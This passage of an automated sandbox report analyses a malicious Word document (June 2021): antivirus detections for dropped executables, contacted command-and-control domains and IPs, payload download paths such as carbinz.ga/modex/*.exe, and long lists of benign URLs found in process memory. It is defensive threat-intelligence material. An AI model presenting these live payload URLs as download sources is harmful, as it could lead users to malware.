          7.0.control.exe.540000.0.unpack100%AviraTR/Dropper.GenDownload File
          5.0.prosper3512.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          5.2.prosper3512.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.prosper3512.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          5.2.prosper3512.exe.5772f0.1.unpack100%AviraTR/Dropper.GenDownload File
          4.2.prosper3512.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          carbinz.ga7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          www.updatesz.com/hlx/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          carbinz.ga
          		185.239.243.112
          		truetrueunknown
          centerstageacademyaz.com
          		184.168.131.241
          		truetrue
            		unknown
            www.pwagih.com
            		unknown
            		unknowntrue
              		unknown
              www.skip1-dndasasd.com
              		unknown
              		unknowntrue
                		unknown
                www.centerstageacademyaz.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.updatesz.com/hlx/true
                  • Avira URL Cloud: safe
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.msn.com/?ocid=iehpsexplorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1esexplorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://search.rediff.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.naver.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.google.ru/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.daum.net/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://buscar.ozu.es/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.about.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.ask.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.cjmall.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://search.centrum.cz/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://suche.t-online.de/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.google.it/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.amazon.de/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://nsis.sf.net/NSIS_Errorprosper3512.exe, prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://sads.myspace.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://search.sify.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://search.ebay.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://search.nifty.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.google.si/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.google.cz/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.soso.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.univision.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.ebay.it/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://busca.orange.es/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://investor.msn.com/explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://search.espn.go.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://service2.bfast.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        185.239.243.112
                                                                                                                                                        		carbinz.gaMoldova Republic of
                                                                                                                                                        		55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                                                                                                                                        184.168.131.241
                                                                                                                                                        		centerstageacademyaz.comUnited States
                                                                                                                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                        Analysis ID:432651
                                                                                                                                                        Start date:10.06.2021
                                                                                                                                                        Start time:16:21:17
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 10m 29s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:AWB00028487364 -000487449287.doc
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winDOC@10/12@5/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 24% (good quality ratio 22.8%)
                                                                                                                                                        • Quality average: 76.6%
                                                                                                                                                        • Quality standard deviation: 28.2%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 90%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .doc
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.180.211
                                                                                                                                                        • Excluded domains from analysis (whitelisted): ghs.google.com
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        16:21:36API Interceptor32x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                        16:21:40API Interceptor103x Sleep call for process: prosper3512.exe modified
                                                                                                                                                        16:22:15API Interceptor160x Sleep call for process: control.exe modified
                                                                                                                                                        16:22:55API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        185.239.243.112Order10 06 2021.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.ga/modex/macsx.exe
                                                                                                                                                        PO210530_332641.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.ga/modex/wealthx.exe
                                                                                                                                                        NEW ORDER Ref PO-298721.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/catx.exe
                                                                                                                                                        Payment Advice.docGet hashmaliciousBrowse
